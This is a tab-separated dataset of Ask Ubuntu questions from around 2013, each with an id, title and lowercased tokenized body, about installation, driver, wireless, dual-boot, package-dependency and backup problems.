349504	how to install xubuntu inside windows ( no downloading )	i have these files . ubuntu-12.04.3-wubi-amd64.tar.xz ubuntu-12.04.1-i386.iso xubuntu-12.04-i386.iso i want to install xubuntu inside windows . i have tried with wubi.exe -- dimagepath=path but still it gives an error can not download metalink and therefore iso ... please help me with this . is there any way to tell wubi to pick up xubuntu 's iso from my pc ? thanks
349506	ubuntu wont shutdown completely after installing fingerprint-gui	hi i have been using ubuntu for some 2 months with gnome ( http : //ppa.launchpad.net/gnome3-team/gnome3/ubuntu ) .it was working fine until i installed fingerprint scanner ( http : //ppa.launchpad.net/fingerprint/fingerprint-gui/ubuntu ) now whenever i shutdown the computer it stops in b/w and i have to force power off.- i.stack.imgur.com/ bzzq9.jpg another thing is that my gnome also got messed up once- i.stack.imgur.com/sm9mh.jpg please help me fix this this might be cause of my problem- it removes policykit-1-gnomeâ , âpolkit-kde-1 ''
349508	choice of 32 bit or 64 bit ubuntu for notebook	i have hp notebook with amd turion 64x2 processor with nvidia geforce go 6150 display adaptor . which ubuntu i can use 32 bit or 64 bit to dual boot with windows 7 ?
349509	indication of application loading in launcher	is it possible to get an indication of an application loading when you open it from the a folder . i.e . opening a video with vlc takes a bit of time while vls loads all the required bits . i end up clicking a few times to many wondering if i double clicked well the first time , and then end up closing 2 or 3 vlc windows ... something like the bouncing dock icon in osx would be tip top is it possible to add an anti-bounce while the application is loading ? clicking wo n't do anything .
349510	partitions are n't shown during installation of ubuntu 13.04	i 've bought a new laptop ( dell inspiron 15 3521 ) with windows 8 . since i mainly use linux i removed the 7 partitions windows 8 apparently needed and made 4 partitions using a pmagic live usb ( windows 80 gb , linux 80 gb , data 150 gb , swap 8 gb ) and since i had some problems with getting it to boot from a dvd i installed linux first without problems . but when i got the dvd to work ( legacy mode and the a driver on a usb plugged in during installation serial-ata_driver_85fv7_wn_11.7.0.1013_a01 ) it gave an error ( windows can not be installed on this disk . the selected disk is of the gpt partition style. ) . to fix this i removed all partitions ( including the ubuntu partition ) and made a new one . windows also made a dedicated windows partition of 100mb . after the timely installation of windows 7 i got out my ubuntu 13.04 usb drive and preformed a live boot . when i got to the point of creating a new partition ( using the ubuntu 13.04 installer ) for linux the partition manager did n't show any partitions on the drive at all only 320 gb of 'unallocated space ' . i was however able to mount the partitions on the drive . so i know they are there and that ubuntu can see them . so i booted with my pmagic live usb and the partition editor promted me with the following question : warning : /dev/sda contains gpt signatures , indicating that it has a gpt table . however , it does not have a valid fake msdos partition table , as it should . perhaps it was corrupted -- possibly by a program that does n't understand gpt partition tables . or perhaps you deleted the gpt table , and are now using an msdos partition table . is this a gpt partition table ? yes/no ? who can help me to fix this problem ?
349511	libreoffice base and unmet dependencies	my database in libreoffice base is all of a sudden locked for editing . moreover , libreoffice base exits whenever i try to insert a photo into a database post . i have worked in my relational database for months and have not made any changes to the design , only populated it . i have tried to remove libreoffice base in order to be able to install the software afresh . this is not possible through the software center . here is the error message : installarchives ( ) failed : dpkg : error processing libx11-6 ( -- configure ) : libx11-6 : amd64 2:1.4.99.1-0ubuntu2.1 can not be configured because libx11-6 : i386 is in a different version ( 2:1.4.99.1-0ubuntu2.2 ) dpkg : error processing libx11-6 : i386 ( -- configure ) : libx11-6 : i386 2:1.4.99.1-0ubuntu2.2 can not be configured because libx11-6 : amd64 is in a different version ( 2:1.4.99.1-0ubuntu2.1 ) errors were encountered while processing : libx11-6 libx11-6 : i386 error in function : dpkg : error processing libx11-6 ( -- configure ) : libx11-6 : amd64 2:1.4.99.1-0ubuntu2.1 can not be configured because libx11-6 : i386 is in a different version ( 2:1.4.99.1-0ubuntu2.2 ) dpkg : error processing libx11-6 : i386 ( -- configure ) : libx11-6 : i386 2:1.4.99.1-0ubuntu2.2 can not be configured because libx11-6 : amd64 is in a different version ( 2:1.4.99.1-0ubuntu2.1 ) the software center asks if i want to try to repair the error or cancel . choosing repair results in the same menu popping up again and again and again to ask if i want to repair the error or cancel . i have run apt-get install -f more times than i care to remember . the result is this : reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : linux-headers-2.6.38-8-generic libraw5 linux-headers-2.6.38-8 libplot2c2 libpano13-bin libqjson0 libpano13-2 libzthread-2.3-2 use 'apt-get autoremove ' to remove them . the following extra packages will be installed : libx11-6 the following packages will be upgraded : libx11-6 1 upgraded , 0 newly installed , 0 to remove and 63 not upgraded . 2 not fully installed or removed . need to get 0 b/763 kb of archives . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y dpkg : error processing libx11-6 ( -- configure ) : libx11-6 : amd64 2:1.4.99.1-0ubuntu2.1 can not be configured because libx11-6 : i386 is in a different version ( 2:1.4.99.1-0ubuntu2.2 ) dpkg : error processing libx11-6 : i386 ( -- configure ) : libx11-6 : i386 2:1.4.99.1-0ubuntu2.2 can not be configured because libx11-6 : amd64 is in a different version ( 2:1.4.99.1-0ubuntu2.1 ) errors were encountered while processing : libx11-6 libx11-6 : i386 e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i have also tried apt-get update , apt-get autoremove , apt-get autoclean , all of them to no avail . the problem seems to my novice eyes to be to do with libx11-6 where some file is in a wrong version , and it is clear that apt-get install -f does not solve the problem . how to fix it ?
349515	run option not highlighted in netbeans 7.3.1	i have installed netbeans 7.3.1 in ubuntu 13.04 to run java programs but i am unable to run any program since none of the options under the run menu is highlighted even the shortcuts like shift + f6 is not working . i tried the older version of the netbeans ( available in the ubuntu software center ) but facing the same problem . i re installed many times but all in vain . similarly , when i tried running eclipse it says select what to run 1 . ant build 2 . ant build ... and then tried both the option but in both the option it says `` build failed . unable to find an ant file to run '' . and it works fine when i run any java program from the terminal . whats the problem and how can i configure these ides . i have open jdk 7 ( from ubuntu software center ) installed in ubuntu 13.04
349516	ubuntu 12.10 installed on acer one zg8 , web cam not working , just updated to 13.04 , still no joy	i had installedd 12.10 on an acer one zg8 due to blue screening with windows 7 , an it was working fine except that i couldnt access the web cam at all , recently upgraded to 13.04 ringtail an still no joy , does anyone know how to access the webcam/camera or is there a driver that i need to download from somewhere ... hope you can help many thanks dave .
349517	i can not access yahoo website in ubuntu 13.04 from firefox	i installed ubuntu 13.04 , mozila firefox can not open yahoo website , i installed google chrome also , but i have got page not available message . answer please
349520	check if last powerdown was clean	i want to make a script that checks if last power down was a clean or unclean . if it 's not a clean boot/reboot it sends me an email . but how do i check if it was a proper shutdown ?
349523	what does the 'grep ' command do ?	i would like to learn how to use it so i can start to use the terminal more .
349524	i am trying to enable the wireless on a acer travelmate 2480 in 12.04 , it is working fine in xp	i have tried reinstalling drivers and have tried opening terminal and typing jockey-gtk but nothing seems to install wireless drivers that work . chip id is 4311 and pci-id is 14e4:4311
349525	highpoint 640l raid card on ubuntu 12.04 : drivers for initial install ?	i recently built a prospective file server with these specs : msi b75ma-e33 3 x 500gb wd black hdd highpoint 640l raid card and i was hoping to install ubuntu 12.04 and configure a windows file server with samba . unfortunately i 'm stuck as i can not find any drivers to install the raid card , and therefore see the hdds and install the os and software on the system . i have very little experience with linux/ubuntu and this is sort of my trial under fire . i did some googling and found some prospective answers , but none that i fully understood nor any that seemed to work in my situation . basically i need two things : a simple yes or no answer if what i 'm doing is even possible if it is , a quick run through of what needs to be done . i know the linux community has a reputation for being helpful . hopefully somebody has an idea of what i need to do to get this working ! thanks in advance !
349526	how to set grub default , not windows boot manager	i am using vaio t series with win 8 preinstalled , i have installed ubuntu 12.04.3 on a different partition and set grub at default . but whenever i choose to boot win 8 , the next time i start the laptop , it windows boot manager which shows up at default . how can i set grub default constantly ?
349537	multiple displays	i am currently using ubuntu 13.4 , and i sometimes use two screen to make things easier sometimes ; but there is an annoying problem . whenever i try to change the resolution at a different level on any screen , the orientation locks itself to clockwise and their is no way to return it back to normal unless i exit . i actually allowed it once to keep the changes and it got stuck until i figured out how to stop that nonsense with the orientation . so now i cant upgrade the resolution and stay stuck on the 1000x800 resolution on both screens . how do i change it normally ? i used to be able to do that without that annoying problem .
349538	graphical remote destop connection to see the open windows	is there any command to pop up all of the open windows in a remote ubuntu ? i am using ssh -x . any other solution to see the open windows graphically ?
349539	unable to install ubuntu server in virtualbox	i am attempting to install ubuntu server 12.04 lts ( i also tried 13.04 ) on a headless freebsd 9.1 server through the virtualbox cli . i have the freebsd port of virtualbox installed and the ubuntu server setup goes well up to about 70 % of the installation when it attempts to install the kernel package `` linux-generic-lts-raring '' where it fails . it specifically fails when it is looking for kernel header files . it seems some ubuntu users have encountered this before , particularly when upgrading and the solution is to install the latest kernel header files ( e.g . apt-get install linux-headers-2.6.32-34 ) . my question is then how am i supposed to get this header package when i am not on a linux host ? i have setup up the ubuntu vm to user hostonly networking so it does not access to the internet while i am installing . would giving it internet access help ? i got my server image from the ubuntu site and i thought it would have everything i needed on it .
349540	installing nvidia proprietary drivers breaks opengl compilation	when i install the nvidia proprietary driver in ubuntu 13.04 i can longer compile any opengl code written in c. i think the nvidia drivers breaks or replaces the symlinks in the /usr/lib/ directory but unfortunately i do not know enough of how to fix it . the error i get is that there is no rule to make libgl.so just using the opensource driver works for compiling but it does n't work for playing diablo 3 and wow ; ) i have reinstalled ubuntu 3 times today and really do not feel like messing up again . does anyboody know why this is happening and how to fix it please ? edit : using the 310 drivers seems to work .
349541	finding volume raise/lower command ( s )	i 'm using lubuntu 13.04 and am looking for the command to raise and lower my volume in increments so i can add that command to my lubuntu-rc.xml file thus binding it to my xf86audioraisevolume ( i.e . fn+uparrow ) key . right now , according to the lubuntu-rc.xml file , the fn+uparrow combination executes amixer -q set master 3 % + unmute , but when i type this command in the terminal i get the error message amixer : unable to find simple control 'master',0 . i 've looked at similar questions , but they 've availed me nothing . i really do n't understand alsa ( nor pulseaudio ) .
349542	can microsoft office 365 or a similar web app be used from ubuntu ?	i need to generate word documents ( both .doc and .docx ) , which will work on a typical windows or mac setup with any common version of microsoft word to the degree possible . libreoffice sometimes does n't do the job , the layout comes out different . ) this thread explains how to verify a document for word compatibility using skydrive . is there a solution that allows editing ? would office 365 ( paid subscription ) work in firefox/chrome ( ium ) / ? ? on ubuntu ?
349544	install program into folder which is equivalent to windows program files	i 'm new to ubuntu . i want to install netbeans ide , i feel like it should n't be installed into home directory , but do n't know where is equivalent to windows program files folder , please explain me about where to install ubuntu apps ? this is a screenshot i got from the internet , as default installation folder for netbeans ide thanks .
349550	latest 12.04 update dkms never ends ?	latest ubuntu update leads to : -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- deleting module version : 6.20.155.1+bdcom completely from the dkms tree . -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- done . loading new bcmwl-6.20.155.1+bdcom dkms files ... building only for 3.5.0-40-generic building for architecture x86_64 building initial module for 3.5.0-40-generic done . wl : running module version sanity check . - original module - no original module exists within this kernel - installation - installing to /lib/modules/3.5.0-40-generic/updates/dkms/ depmod ... . dkms : install completed . _ < < < < < < never comes back if i ctrl^c then the whole ubuntu update system fails with broken locks all over the place ... should i leave this to run to infinity ?
349555	language-selector-gnome in precise can not be checked for update	i tried to update the system ( ubuntu 12.04 lts `` precise '' ) with the update manager . it shows 2 important security updates for language-selector-common ( 0.79.4 ) and language-selector-gnome ( 0.79.4 ) , but they ca n't be selected . they should be , as any package in update manager and as i had done a lot of times . i check in synaptic and found the two packages marked with an ! symbol in gray ; i do n't know what it means . the installed version is 0.79 , for both packages . i mark them for update , and synaptic asks to mark for delete language-selector-gnome , ubuntu-desktop and ubuntu-standard . i do n't know if i should delete them or do something different . if i try to update language-selector-gnome first , it asks to delete ubuntu-desktop . if i try to apply the changes , synaptics shows a message saying that it can not update because it has language-selector-commons as an unsolvable dependency ( it needs language-selector-common 0.79.4 ) . what should i do ? leave it without updating ? if update , which would be the correct order in the process ? ( `` first delete this package , then update the other , then reinstall a third '' or something like that ) . is the bug in update manager , instead ? i guess it has something serious ; i 've checked the changes report in the un-checkable update and it shows : '' security update : possible privilege escalation via policykit uid lookup race . - dbus_backend/ls-dbus-backend : pass system-bus-name as a subject instead of pid so policykit can get the information from the system bus . '' it is confirmed in the national vulnerability database ( linked from cve-2013-1066 ) , it links also to a bug for the update ( 0.79.4 ) , not for the package to be updated ( 0.79 ) : https : //launchpad.net/ubuntu/+source/language-selector/0.79.4 so even the update should be reviewed . thanks in advance .
349558	i can not wirelessly connect my hp pavillion dv6000 to the internet	i am trying to connect my laptop to the internet , i have an internet cable attached and i select `` additional drivers '' from the system settings as i have read elsewhere . i get 2 drivers to install , one broadcom sta wireless driver and a software modem . i try to install them ( while i have internet on the laptop ) , i put my password as required but i get these errors : when i try to install the broadcom i get : sorry , installation of this driver failed . please have a look at the log file for details : /var/log/jockey.log when i try to install the software modem i get this : systemerror : e : unable to correct problems , you have held broken packages . i 've tried everything i read to get this working properly but i failed . please be lenient as it 's my first ever attempt on ubuntu : p thank you
349559	kubuntu dist-upgrade	i 'm running kubuntu 12.04.3 ... today i 've updated kde to the latest version ( from 4.10.5 to 4.11.1 ) , without any problem ... but it looks like that all applications that should have been updated too show the old version , even if the package version of the app , in software manager , it 's the updated one . so , how can i force my system to use the latest version ?
349562	bluetooth not working properly ?	when i turn on the bluetooth no settings or options are available . what should i do ?
349564	ca n't connect wifi in windows 8 after ubuntu 12.04.1 install	i have recently installed ubuntu 12.04.1 in my sony vaio along with windows 8 ( uefi ) . i had no problems connecting to the wifi network in windows 8 until i installed ubuntu . now i am only able to connect in ubuntu . however , after two seconds after i press the button `` connect '' in the windows 8 network panel , it shows the error message `` could not connect to this network '' ( traslated from the spanish message ) . i 've done a google search and so far i could not find any solution . how could this be solved ? any suggestion will be appreciated . thanks . some details : - laptop sony vaio sve1513f4 - ubuntu version 12.04.1 64 bits - wifi security type : wpa2-enterprise
349566	two monitors without mirroring	i have a trouble - i have ubuntu 13.04 with cinnamon installed , and when i connect to monitor , it makes this : i want it to make two split monitors with same dimensions . is it possible to make it ? my graphic card ati rs690m [ radeon x1200 series ] ( source : hwinfo ) when i connect to second monitor ( even monitor even projector ) , the first monitor devides to thirds . the right third displays part of content that should be on second display ( rest of content displays corectly , but without this part ) , and do n't work properly . here is scheme : hwinfo : hardware class : graphics card model : `` ati rs690m [ radeon x1200 series ] '' vendor : pci 0x1002 `` ati technologies inc '' device : pci 0x791f `` rs690m [ radeon x1200 series ] '' i havent installed any extra driver ( maybe thats the problem ? ? ) xrandr said this : screen 0 : minimum 320 x 200 , current 2080 x 800 , maximum 8192 x 8192 vga-0 connected 800x600+1280+200 ( normal left inverted right x axis y axis ) 338mm x 270mm 1280x1024 75.0 60.0 1024x768 75.1 70.1 60.0 832x624 74.6 800x600 72.2 75.0* 60.3 56.2 640x480 72.8 75.0 66.7 60.0 720x400 70.1 lvds connected 1280x800+0+0 ( normal left inverted right x axis y axis ) 331mm x 207mm 1280x800 59.9*+ 1280x720 59.9 1152x768 59.8 1024x768 59.9 800x600 59.9 848x480 59.7 720x480 59.7 640x480 59.4 havent found any xorg.conf file in /etc/
349571	motd - show memory usage	i 'm a n00b when it comes to bash scripting , so i was hoping someone could help me out . i have a server running 11.04 , and my message of the day includes how much memory is currently used : system information as of tue sep 24 10:58:28 mdt 2013 system load : 0.0 processes : 90 usage of / : 16.6 % of 19.68gb users logged in : 0 memory usage : 49 % ip address for eth0 : xx.xx.xx.xx swap usage : 12 % ip address for eth1 : xx.xx.xx.xx i spun up another server running 13.04 , and that message is n't there . so it looked into how to add it , and found on my 11.04 server under /etc/update-motd.d there is a link to a script at /usr/share/landscape/landscape-sysinfo.wrapper : # ! /bin/sh cores= $ ( grep -c ^processor /proc/cpuinfo 2 > /dev/null ) [ `` $ cores '' -eq `` 0 '' ] & & cores=1 threshold= '' $ { cores : -1 } .0 '' if [ $ ( echo `` `cut -f1 -d ' ' /proc/loadavg` < $ threshold '' | bc ) -eq 1 ] ; then echo echo -n `` system information as of `` /bin/date echo /usr/bin/landscape-sysinfo else echo echo `` system information disabled due to load higher than $ threshold '' fi i added this script to my 13.04 server , but the script must be running into an error somewhere because it shows the `` else '' message , `` system information disabled due to load higher than 1.0 '' . both servers have the same specs , other than the version of ubuntu they 're running . how can i edit this script on my 13.04 system to get it to show current memory usage ? update : it looks like 13.04 does n't have landscape . i ran dpkg -l | grep landscape and no results . 11.04 has it running . so i guess the question is , how can i show memory usage without landscape ?
349573	removing ubuntu , please help	i had the wubi.exe in my 16gb usb drive . when attempting to install it , i mistakenly selected my usb drive as my installation drive . after installing , i formatted my usb drive , meaning the uninstaller is gone . current problem : -now my pc asks for choosing an operating system between windows 8 and ubuntu where the ubuntu does not work . -i am trying to get rid of that ubuntu without affecting my windows 8 . -from windows 8 , system configuration > boot , it only shows windows 8 ( no ubuntu ) , so i ca n't even delete it . -i used easybcd 2.2 which does not list any os . ( i think my windows 8 is installed on my 24gb ssd ) -most internet solutions says to delete the partition which contains ubuntu . but i selected usb drive at the first place which is not a partition . -since my usb is formatted , it should not have ubuntu . yet , regardless of if the usb drive is connected , when i restart my computer , it displays os choosing screen which lists windows 8 and ubuntu . how do i get rid of that ubuntu ? please help me . i really do not want to factory reset my laptop .
349579	trying to configure autologin for ubuntu 12.04 as xbmc	i have installed 12.04 from the minimal iso and installed xbmc . since then i have edited : /etc/lightdm/lightdm.conf to say : [ seatdefaults ] autologin-user=xbmc autologin-user-timeout=0 user-session=xbmc greeter-session=lightdm-gtk-greeter however i still get prompted for a password at boot . why is this not working ?
349580	storage pooling using overlayfs	i 'm planning to move my 12.04 media server to 13.04 . i 'm adding an ssd and want to start with a clean installation . currently i use an aufs mount to pool my various data drives together into one /storage mount point . i like things this way . apparently aufs had been ditched at some point in favour of overlayfs . the problem is there is very little documentation on this around , and previous discussions ( such as how do i use overlayfs ? ) focus on different use cases . each overlayfs seems to only accept merging of two directory trees ( upper/lower ) so i would need to make some kind of pyramid/matryoshka filesystem . also , the documentation makes it sound like it really was n't designed to do what i want . has anyone give me any pointers on overlayfs or suggest a viable alternative ?
349581	password authentication problem	so i wanted to download some software , and it says i need to put in my password , but i did n't put a password on my account , so i did n't add a password and clicked authenticate , but it says that my authentication attempt was unsuccessful , what do i do ? i ca n't download anything now ... and i 'm new to ubuntu as well ...
349582	installing and running glpk	i 'm trying to do some simple linear programming problems , and from what i gather , glpk is a good tool . problem is , i am completely lost on how to download/install/run this ! any help appreciated !
349585	when ever i connect my ubuntu to internet no other device is able to access internet from my wifi router	i am using ubuntu studio . when ever i connect my ubuntu to internet no other device like other laptop or even mobile phone is able to access internet from my wifi router .
349586	vesa : sumo driver instead of being the ones i installed ( fgrlx-updates ) ubuntu 13.04 64-bit igp ( hd 6xxxg )	hello everyone and thank the community for providing support for linux newbie like me . i 'll go with a problem that i face to : when you get to the menu with my video card details show : vesa : sumo driver instead of being the ones i installed ( fgrlx-updates ) or to show what card is installed on the laptop ... product : sumo [ radeon hd 6380g ] p.s . this is my first post here , so if the problem is already solved sorry .
349587	max resolution problem	my monitor resolution 1600x1200 but when i go to settings and displays the maximal resolution is 1360x768 i tried detect displays but nothing happened
349590	i have a problem with installing ubuntu 13.04	i have windows 7 like main system , but i want to install ubuntu , and delete windows so i download normally ubuntu put it on usb bootable and boot it after laptop restart..now problem is that i can see menu with try ubuntu , install and that stuff , but when i enter in some of that option which need to start ubuntu and show desktop that is where my problem begins ... i do n't see the menu bar , background anything i see only gray in few various shades . i tryed to delete nvidia driver , but its say its not installed so i do n't know what to do if anyone can help me answer.. yes i forgot i had on same notebook long ago some ubuntu 9.x or 10.x do n't remember and it worked perfect this problem happend from 11.x or 12.x do n't remember
349591	fuse exfat error	i have windows 7 along with a fat64 partition holding most of my data . i then installed ubuntu 12.04 , and most things are fine . of course , ubuntu does n't read exfat , so following these instructions i ran sudo -s apt-add-repository ppa : relan/exfat apt-get install fuse-exfat followed by cd /media sudo -s mkdir usbdrive mount -t exfat /dev/sdd1 usbdrive and got this error : fuse exfat 1.0.1 error : `pagefile.sys ' real size does not equal to size ( 0 ! = 8565587968 ) . how can i get this to mount ?
349592	restore partition from entire hdd image	i backed up my hdd using # dd if=/dev/sda bs=8m | gzip -9 > `` /media/ [ ... ] /sda.gz '' and have this additional information : # fdisk -lu platte /dev/sda : 500.1 gbyte , 500107862016 byte 255 köpfe , 63 sektoren/spur , 60801 zylinder , zusammen 976773168 sektoren einheiten = sektoren von 1 × 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xcb2d026d gerät boot . anfang ende blöcke id system /dev/sda1 * 63 104859647 52429792+ 7 hpfs/ntfs /dev/sda2 299593728 341536767 20971520 7 hpfs/ntfs /dev/sda3 341536768 976769023 317616128 7 hpfs/ntfs /dev/sda4 104859648 299593727 97367040 5 erweiterte /dev/sda5 204800000 288686079 41943040 83 linux /dev/sda6 288688128 299593727 5452800 82 linux swap / solaris /dev/sda7 104861696 204797951 49968128 83 linux partitionstabelleneinträge sind nicht in platten-reihenfolge [ ... ] # fdisk -l platte /dev/sda : 500.1 gbyte , 500107862016 byte 255 köpfe , 63 sektoren/spur , 60801 zylinder einheiten = zylinder von 16065 × 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xcb2d026d gerät boot . anfang ende blöcke id system /dev/sda1 * 1 6528 52429792+ 7 hpfs/ntfs /dev/sda2 18649 21260 20971520 7 hpfs/ntfs /dev/sda3 21260 60802 317616128 7 hpfs/ntfs /dev/sda4 6528 18649 97367040 5 erweiterte /dev/sda5 12749 17970 41943040 83 linux /dev/sda6 17971 18649 5452800 82 linux swap / solaris /dev/sda7 6528 12749 49968128 83 linux partitionstabelleneinträge sind nicht in platten-reihenfolge [ ... ] ( i 'm sorry that it 's in german . the line in the end says that the partitions on the hdd are in different order , 'erweiterte ' means 'extended ' and the heads of the tables are : device , boot , start , end , blocks id , system . i guess the rest is either self-explaining or not important . ) i want to restore single partitions ( /dev/sda1 , /dev/sda2 and /dev/sda3 ) from the image without restoring the other partitions . can you help me with this ? and can you tell me please what the plus behind the number of blocks of /dev/sda1 means and what 's the correlation between the number of blocks and the difference of end and start of a partition ? thank you .
349593	proprietary nvidia video drivers broken ( possibly with my display )	the reason i believe that this is my display is that the proprietary drivers used to work about a year ago with the same hardware . i have a korean `` knock off '' ips monitor that probably does n't have a massive userbase . the pre-installed drivers work just fine , but they do n't function correctly for gaming , so it 's not usable for me . rebooting the computer after enabling a proprietary driver will result in a black screen . ctrl+alt+f1 brings up a command prompt as it should , and `` xorg '' will result in the same issue happening again . thus , x is broken . removing the drivers and going back to the default does fix the issue . that is n't what i need though , so is there any way to potentially debug why this is happening and fix it with the nvidia drivers ? i should add that this happens on every linux os i 've tried it on as well . i started with ubuntu and reproduced it on xubuntu , mint , debian , and elemtentary os .
349595	my wireless on ubuntu 12.04.3 suddenly stopped working	my wireless on ubuntu 12.04.3 was working properly for about 1 year but it suddenly stopped working . it `` sees '' the wireless connection on the list , tries to connect but then the window asking for the password . i enter it but starts all over again ( tries to connect , asks for password etc . ) another ( windows ) laptop that shares the same wireless connection continues working fine . i called the provider ( talktalk for those familiar with uk providers ) and they could n't find anything wrong on their end . i deleted the saved connection so that it reset but it did n't resolve the problem . what could the issue be ? thanks !
349596	how to install ubuntu in microsoft virtual pc ?	i tried to install on a virtual pc , but i get a message that says the kernel requires and x86-64 cpu . it states that it detected an i686 cpu . the host machine is an amd phenom ii x4 955 . host os : windows 7 ultimate 64-bit visualization software : microsoft virtual pc version 6.0.156.0 guest os : ubuntu-12.04.3-desktop-amd64
349598	video support for samsung t27b350nd display with ubuntu 13.04	i just installed ubuntu 13.04 using a samsung t27b350nd display . the install windows all displayed properly . when the install completed and i rebooted the display shows a series of dashes . i plugged in an old display and the desktop was perfect . do i need a driver update or something ?
349599	which version should i install for intel atom cpu 230 @ 1.6 ghz , 1g ram acer aspire revo ?	i have an acer aspire revo r3600 , intel atom cpu 230 @ 1.6 ghz , 1g ram , 120g hard disk and currently running window xp ( but in the system properties , it says 895 ram only ) . it is slow and so i would like to install ubuntu os on it to improve the performance but not sure what version of ubuntu i should install . i only found previous literature that people installed ubuntu version 9.x in this machine written in 2009. now that ubuntu has higher version . can someone advise what is the ubuntu version i should install given this machine spec ? anyone tried it ? also , does this version support other lanugage ( chinese ) ?
349600	how can i compile a .deb file for network-manager 's git	i need to install a version of network-manager that has the enhanced nmcli ( allowing creation of new connections from cli only ) , and i was n't able to find a ppa with a recent enough version . how can i compile a deb file from network-manager 's git repository to deploy this onto multiple machines ? i need to create this to be installed on ubuntu precise .
349605	thunderbird does not store remote address books ' passwords	i have the following problem : i am running a ubuntu 13.04 64 bit on a lenovo thinkpad s430 . as email composer i use thunderbird ( 24.0 ) . all my contacts are being synced from an owncloud address book to my phone and my thunderbird on my windows machine ( using inverse sogo connector for thunderbird ) . on the windows machine the password for that remote address book is saved within the thunderbird password manager ( it shows in the manager ) . now i wanted to set that configuration up on my ubuntu notebook . so my thunderbird with sogo connector can actually sync the address book just fine , but fails to store the password . it would always ask again for the login/password when i start thunderbird . i have already tried reinstalling thunderbird , sogo connector , adding and readding the address book . i have never experienced that problem ever before . i am using that sync for quite a while now . maybe somebody has some suggestions which could lead to a solution . cheers , andehhh
349607	installing ubuntu 13.04 on hp g series	more specifically the g6-1344ea , alongside windows 7 64-bit . installing from an 8gb memory stick , when installing it will reboot after the screen where you choose if alongside windows 7 , or ontop of etc . after restarting it will boot back into the try it now . installed using the same memory stick onto a standard desktop successfully , so not sure what 's happening , any tips ? ** i think i found a fix , i will finish uploading the video , try it and change this message if it worked . ** hp install all 4 of the allowed 4 partitions on their laptops ( local disk c : , recovery d : , and hp_tools g : , leaving not enough for ubuntu ( or any other os ) . removing hp_tools ( fingers crossed ) fixes this .
349608	can unity be used as an independent interface in a custom non-ubuntu build os ?	i am working on a custom-build of 12.04 with openbox , on low-resource netbooks . i have installed unity , but it is not available at login , nor by any other apparent means , and i can not find any coherent answers . i want to use unity as an interface , without having to install all the 'heavy ' dependencies , such as nautilus . is this possible , or is it necessary to use a full-weight , resource-hungry , standard ubuntu installation ? i 'm using lightdm . running gnome-session defeats the object : i 've already removed as many lxde components to lighten the load . i 'd have liked to run unity on openbox , but the two do n't seem to work together . i edited the startup script , and had to re-edit it from a live cd session . it was a close shave ! ! ! even running 'unity -- replace ' crashed the desktop to login . i 'll stick with openbox and tint2 .
349610	websites ca n't seem to access flash local storage	there is an educational website my kid uses for school which requires flash . during the login process i am directed to click `` allow local storage '' ( this is the website 's button , not adobe 's popup ) , which i assume directs the browser ( or plugin ) to store information on my hard drive . now , the problem is that after having the website store ( or attempt to store ) the flash data on my hard drive , nothing happens . there is no popup asking my permission if i will allow that particular website access to my local data storage . i checked the local data storage permissions through the macromedia web address and websites are allowed to store data . in fact , i checked my hidden .macromedia folder in my home folder and there is in fact a folder being created there with the name of the website i am trying to use . this folder is being created when i click on the educational website 's `` allow local storage '' button . i 've tried both chromium and firefox . i 've changed the browser settings to allow all storage ; i 've checked the permissions on the .macromedia folder and ensured i am the owner ; i can see that a folder with the website 's name is being created inside the .macromedia folder when attempting to use flash 's local data storage ; i 've verified that global settings do indeed allow for local data storage . i am not willing to install google chrome . i could very much use some suggestions , i am not very familiar with linux so please give me your instructions in `` barney style '' . ubuntu 12.04.3 all updates .
349613	how to exclude a folder from rsync	i am trying to backup my home folder on my nas drive . i am giving this : rsync -paz -- exclude-from 'rsync-exclude.txt ' /home/chris/ admin @ 192.168.1.65 : linuxhome where rsync-exclude.txt has this content : /home/chris/downloads/* /home/chris/downloads/ /home/chris/downloads/* . * and it is in the same folder i execute rsync ( home folder ) . however the rsync tries to copy this folder , too . what am i doing wrong ?
349617	can i keep windows 7	a friend in my college introduced me to ubuntu it looked nice but i also love the windows 7 os , and if i did download ubuntu and install it , he said that when i boot my system it gives me a option to launch with windows/ubuntu and i can access either whenever i wish ? is this true ? or when i install ubuntu can i ever get back to windows 7 what will happen in this situation ?
349621	`` can not write log , openpty ( ) failed ( /dev/pts not mounted ? ) ''	i used this post to install lxc . the installation is success and creating the container complain give this message : '' can not write log , openpty ( ) failed ( /dev/pts not mounted ? ) '' but in the end succeed , when i try to start the container gives to me this error message : lxc-start : failed to create vethapc2ww-vethebkhjt : operation not supported lxc-start : failed to create netdev lxc-start : failed to create the network lxc-start : failed to spawn 'mycon' lxc-start : no such file or directory - failed to remove cgroup '/sys/fs/cgroup/cpuset//lxc/mycon' i used linaro ubuntu 12.04 on odroid-x2 board , and the container config the same as my host system as i used the command sudo lxc-create -t ubuntu -n mycon to create mycon
349623	capture audio output to play through voice in games	i want to capture my audio output as my default capture device in order to play it into the voice chat in the steam game team fortress 2 . i do n't simply want to record audio output .
349627	unable to install software via software center , in sudoers , but not included in users listed	i 'm a sudoer on my workstation and also have the root password , but the ubuntu software center does n't let me install as it only lists a bunch of other users that are able to authenticate . how do i grant myself the org.debian.apt.install-or-remove-packages `` action '' that the details suggest i need ? some other post pointed me to /usr/share/polkit-1/actions/org.debian.apt.policy , but nothing in there is specifically referring to the four other users that the authenticate dialog lists . as an aside ( not really the answer i 'm looking for , but still of-interest ) , is there some way to get a package name from the software center that i can then install with apt-get via the prompt ?
